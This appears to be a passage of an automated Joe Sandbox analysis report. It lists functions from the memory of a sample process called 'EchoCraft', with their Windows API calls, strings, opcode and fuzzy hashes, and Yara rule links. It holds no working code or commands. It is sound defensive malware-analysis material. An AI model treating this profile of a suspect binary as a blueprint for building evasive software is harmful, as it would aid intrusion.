Instruction ID: e303e37fdfc7e98d07ce96a903e6b881be8054c8fe351c1644086d3a406f5593
Opcode Fuzzy Hash: 15f17e21e664efd38ceba814702113c86c536698082507b566736fb04baeeaad
Instruction Fuzzy Hash: 4521A432204511AFD7159B14C845FEA7BE6FF86324F548198F4168B2D2CB75ED92CBD0

Function 00AE8111 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00AE9599: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00AE8126,?,000000FF,?,00AE8F70,00000000,?,0000001C,?,?), ref: 00AE95A8
Part of subcall function 00AE9599: lstrcpyW.KERNEL32(00000000,?,?,00AE8126,?,000000FF,?,00AE8F70,00000000,?,0000001C,?,?,00000000), ref: 00AE95CE
Part of subcall function 00AE9599: lstrcmpiW.KERNEL32(00000000,?,00AE8126,?,000000FF,?,00AE8F70,00000000,?,0000001C,?,?), ref: 00AE95FF

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00AE8F70,00000000,?,0000001C,?,?,00000000), ref: 00AE813F
lstrcpyW.KERNEL32(00000000,?,?,00AE8F70,00000000,?,0000001C,?,?,00000000), ref: 00AE8165
lstrcmpiW.KERNEL32(00000002,cdecl,?,00AE8F70,00000000,?,0000001C,?,?,00000000), ref: 00AE81A0

Strings

cdecl, xrefs: 00AE8197

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: ed2db1eed00adf44eb902492f02b9216547f3e6f63ab558fa345f3f258d04f50
Instruction ID: a7ec177d6460aadf9896c5184eb1e9e7ff7e338e4a93c52926f74eeb5b6e9f45
Opcode Fuzzy Hash: ed2db1eed00adf44eb902492f02b9216547f3e6f63ab558fa345f3f258d04f50
Instruction Fuzzy Hash: A611E63A200381AFCB159F39DC45EBA77A9FF89750B50812AF906C7290EF35D852D7A1

Function 00AB2099 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 262756bbf02d86cf866343fc1a85296cee1cb593654b597c6260072654e03f8c
Instruction ID: ef1bb71ad015cb7d3d88437262cf0973595f38595fa305b5e5dbde93330aceec
Opcode Fuzzy Hash: 262756bbf02d86cf866343fc1a85296cee1cb593654b597c6260072654e03f8c
Instruction Fuzzy Hash: C2018BB22496163EFA212A7C7CC1FE7671DDF423B8B240727B621A21D7EE608C008260

Function 00AE22A1 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00AE22C1
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AE22D3
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AE22E9
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AE2304

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f130023dfd9932557ada8340cdad53428a933ae3980d438f2d72c73db8364302
Instruction ID: a99b1f1ee24ac533801b836b4ae61324976efb6848f6407e72a906fca34ec6d6
Opcode Fuzzy Hash: f130023dfd9932557ada8340cdad53428a933ae3980d438f2d72c73db8364302
Instruction Fuzzy Hash: AA11F73A900229FFEB119BA5CD85F9DBBB8FB08750F2040A1EA00B7290D6716E10DB94

Function 00B1A4FB Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00A823E1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A823F2

GetClientRect.USER32(?,?), ref: 00B1A539
GetCursorPos.USER32(?), ref: 00B1A543
ScreenToClient.USER32(?,?), ref: 00B1A54E
DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 00B1A582

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 3f47b1622f94400fdb8ef4a0cf606e4d969b83ae58be07e95b6a0063abe98d67
Instruction ID: fc324c480dc5508ab954ba77c130df35cd036b5d3f33c528313334758902a992
Opcode Fuzzy Hash: 3f47b1622f94400fdb8ef4a0cf606e4d969b83ae58be07e95b6a0063abe98d67
Instruction Fuzzy Hash: CC115AB1902119EBDB10EF98D8859EE77BAFF15701F904495F902E3150DB34FA81DBA2

Function 00AEE9AD Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00AEE9D4
MessageBoxW.USER32(?,?,?,?), ref: 00AEEA07
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00AEEA1D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00AEEA24

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 38fe240c967b68735628fb15ba2dcaf21212ee9d89a9170dfcabfd115fa27ffe
Instruction ID: 8344575ddec6adb31fa3788a361cac1b81daf3291bb2dcc576a045045fa90310
Opcode Fuzzy Hash: 38fe240c967b68735628fb15ba2dcaf21212ee9d89a9170dfcabfd115fa27ffe
Instruction Fuzzy Hash: CB11DB76901299BFC701DFA99C04ADF7FADEB45351F148259F811E7290DAB48D0487A0

Function 00AAD5EC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,00AAD419,00000000,00000004,00000000), ref: 00AAD638
GetLastError.KERNEL32 ref: 00AAD644
__dosmaperr.LIBCMT ref: 00AAD64B
ResumeThread.KERNEL32(00000000), ref: 00AAD669

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: eb24bdd169d040bcf120921ef76e687bb4914c5420d1d7858fa57f42217c4e90
Instruction ID: 33022b3ba528594c2c0f220d670171e936c91d7493d169bfe37a1be9956faa3b
Opcode Fuzzy Hash: eb24bdd169d040bcf120921ef76e687bb4914c5420d1d7858fa57f42217c4e90
Instruction Fuzzy Hash: 91018C728142147BDB216BA5DC09BAEBA68EF82335F504219F96A975E1DFB08840C7A1

Function 00A86DB1 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A86DEF
GetStockObject.GDI32(00000011), ref: 00A86E03
SendMessageW.USER32(00000000,00000030,00000000), ref: 00A86E0D

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 2a0571f19488fa2f5b3b456af0bbd85ebfe71c0d1168497cab44ad90ade970d3
Instruction ID: d15b808fdbbbe8751a3ce1618bc23dc75e4b6a7f0b8c0d080230d861c30c68cb
Opcode Fuzzy Hash: 2a0571f19488fa2f5b3b456af0bbd85ebfe71c0d1168497cab44ad90ade970d3
Instruction Fuzzy Hash: BA118C72501648BFEF125FA0DC54EEBBBA9FF083A5F444115FA04561A0CB35DC60EBA0

Function 00AB3493 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00AF1070,00000000,00000000,?,00AB343A,00AF1070,00000000,00000000,00000000,?,00AB36AB,00000006,FlsSetValue), ref: 00AB34C5
GetLastError.KERNEL32(?,00AB343A,00AF1070,00000000,00000000,00000000,?,00AB36AB,00000006,FlsSetValue,00B23248,FlsSetValue,00000000,00000364,?,00AB3266), ref: 00AB34D1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00AB343A,00AF1070,00000000,00000000,00000000,?,00AB36AB,00000006,FlsSetValue,00B23248,FlsSetValue,00000000), ref: 00AB34DF

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 591a9dcb37c97a725bbf1aa4bad75c83b14b204ac618e4f8b89fc801bc531108
Instruction ID: e25892985e82bb0d757f29b3d5d850a3291eb968e83773b09bbb8fc00939e19b
Opcode Fuzzy Hash: 591a9dcb37c97a725bbf1aa4bad75c83b14b204ac618e4f8b89fc801bc531108
Instruction Fuzzy Hash: AF01A737611232ABCF324B79EC44ADA7BACAF45B62B254620F91AD7141DB25DA0186E0

Function 00AE7C80 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00AE7C9B
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00AE7CB3
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00AE7CC8
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00AE7CE6

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: b77802f910f3e6351e8267648eb5bd9b45bbf74b0a614b95e369b68d0ef656dd
Instruction ID: 77629058daa0af2427d38b5afcf97ea32a7facad0f55a6bb7c231ef07e901b78
Opcode Fuzzy Hash: b77802f910f3e6351e8267648eb5bd9b45bbf74b0a614b95e369b68d0ef656dd
Instruction Fuzzy Hash: FF116DB5205355AFE7208F65EC48BAA7BFDEF00B00F608569EA16D7150E7B0F9049F50

Function 00AEB8CC Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00AEB4F7,?,00008000), ref: 00AEB8E8
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00AEB4F7,?,00008000), ref: 00AEB90D
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00AEB4F7,?,00008000), ref: 00AEB917
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00AEB4F7,?,00008000), ref: 00AEB94A

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 6474c7778167c4b33937226e59badf07bbf6354e3a047ed9815383a5a847652b
Instruction ID: 29cc1a0db7b923aad6b7e738b0c3a48cd3d8578c1840aeb82ff75529b84aee1e
Opcode Fuzzy Hash: 6474c7778167c4b33937226e59badf07bbf6354e3a047ed9815383a5a847652b
Instruction Fuzzy Hash: 64115B71D1156DEBCF00EFEAE98C6EEBB78BF09711F104095DA41B2241CB309A50CBA1

Function 00B1841C Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00B1843B
ScreenToClient.USER32(?,?), ref: 00B18453
ScreenToClient.USER32(?,?), ref: 00B18477
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B18492

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: e46bf4b019d72f313f13c8d0207403f83c45d0af1e9bfe6c697ec5f3f4abf1af
Instruction ID: 2539f3aefb8e5ced37304af7caa2453d765f0b40ffdcc3b3cb45f56812b425ae
Opcode Fuzzy Hash: e46bf4b019d72f313f13c8d0207403f83c45d0af1e9bfe6c697ec5f3f4abf1af
Instruction Fuzzy Hash: 051114B9D0020AEFDB51DF98D884AEEBBF5FB08310F508166E915E3214DB35AA55CF50

Function 00AE35B2 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00AE35D0
GetWindowThreadProcessId.USER32(?,00000000), ref: 00AE35E1
GetCurrentThreadId.KERNEL32 ref: 00AE35E8
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00AE35EF

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 90331227ca36b50429c933d7e8f388a2419d53a282f4c380eef6f371dfb20a5d
Instruction ID: 336d4ec7f47b90b6bb1d6fd55f747c270fb38b4f20fb421d6a2c4c95ee2d4ceb
Opcode Fuzzy Hash: 90331227ca36b50429c933d7e8f388a2419d53a282f4c380eef6f371dfb20a5d
Instruction Fuzzy Hash: B6E012726012247BDB205B679C4EEEB7F6CDF83BA1F904015F505D3190DEA4DA40D6B1

Function 00B18E6B Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00A81E82: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A81EDC
Part of subcall function 00A81E82: SelectObject.GDI32(?,00000000), ref: 00A81EEB
Part of subcall function 00A81E82: BeginPath.GDI32(?), ref: 00A81F02
Part of subcall function 00A81E82: SelectObject.GDI32(?,00000000), ref: 00A81F2B

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00B18E8F
LineTo.GDI32(?,?,?), ref: 00B18E9C
EndPath.GDI32(?), ref: 00B18EAC
StrokePath.GDI32(?), ref: 00B18EBA

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 6f4ddf37acf393127d0b3b7de2c791bb9b3fe7276d19192478b779ec6eaab6c7
Instruction ID: 010409ae82061491eb945e9d305907d3d1d2129b82937d8b13c3c3cf50375375
Opcode Fuzzy Hash: 6f4ddf37acf393127d0b3b7de2c791bb9b3fe7276d19192478b779ec6eaab6c7
Instruction Fuzzy Hash: 37F05E32002659BADB126F54AC0DFCE3F59AF0A311F84C140FA11221E1CBB59562DBE5

Function 00A820F0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00A8210C
SetTextColor.GDI32(?,?), ref: 00A82116
SetBkMode.GDI32(?,00000001), ref: 00A82129
GetStockObject.GDI32(00000005), ref: 00A82131

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 9a27fd183aedc65791221982a11d1b71b81a057d0c7c03c33266881e00c5817c
Instruction ID: 86e193ced87b1ef27be4cac1dc871227557dc293579feaec39ad9738f2698281
Opcode Fuzzy Hash: 9a27fd183aedc65791221982a11d1b71b81a057d0c7c03c33266881e00c5817c
Instruction Fuzzy Hash: C1E0ED32240680FEDF215B74AC09BE97B61AB22336F58C319F6BA590E0CB7246559B11

Function 00ADEA29 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00ADEA29
GetDC.USER32(00000000), ref: 00ADEA33
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00ADEA53
ReleaseDC.USER32(?), ref: 00ADEA74

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: c69581de6821484df8c5220e9043182af11f9f0e4c6646610a445cc551ac60b3
Instruction ID: 41fe1a37ffcf04ea562b804bfa42d0eb3d0b70cfcf67721f4754970aa106d40a
Opcode Fuzzy Hash: c69581de6821484df8c5220e9043182af11f9f0e4c6646610a445cc551ac60b3
Instruction Fuzzy Hash: 67E012B4800200EFCF00EFA08808AADBBF5FB08311F14C00AE80AE3360CB385A01EF10

Function 00ADEA3D Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00ADEA3D
GetDC.USER32(00000000), ref: 00ADEA47
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00ADEA53
ReleaseDC.USER32(?), ref: 00ADEA74

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: e2800e0a2af160310c491d308ef8b80fc0de9ad0c4d35df355534d8f62bd1b7c
Instruction ID: 6fb9090209257eed723b3e5af83f24e906fc2073fc1cd52bdac5487f5c8e06ce
Opcode Fuzzy Hash: e2800e0a2af160310c491d308ef8b80fc0de9ad0c4d35df355534d8f62bd1b7c
Instruction Fuzzy Hash: DBE092B5900204EFCF51AFA09948AADBBF5FB48311F55C559E94AE3250CB385A01DF10

Function 00AF569E Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00A87A0C: _wcslen.LIBCMT ref: 00A87A11

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00AF57EB

Strings

*, xrefs: 00AF5727
LPT, xrefs: 00AF5712

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: b7a3cadd929a479aa3e0c269b3f903aadcb8a85153fe97333b7741672294252c
Instruction ID: f64c68751099876692f5daf93e50b6018ed9163c5cd558bf8e964b9859fcbfc3
Opcode Fuzzy Hash: b7a3cadd929a479aa3e0c269b3f903aadcb8a85153fe97333b7741672294252c
Instruction Fuzzy Hash: DA915D75E00608DFCB14DFA4C584EA9BBF5AF44314F188099EA4A9F392D771EE85CB90

Function 00AAE69D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00AAE72D

Strings

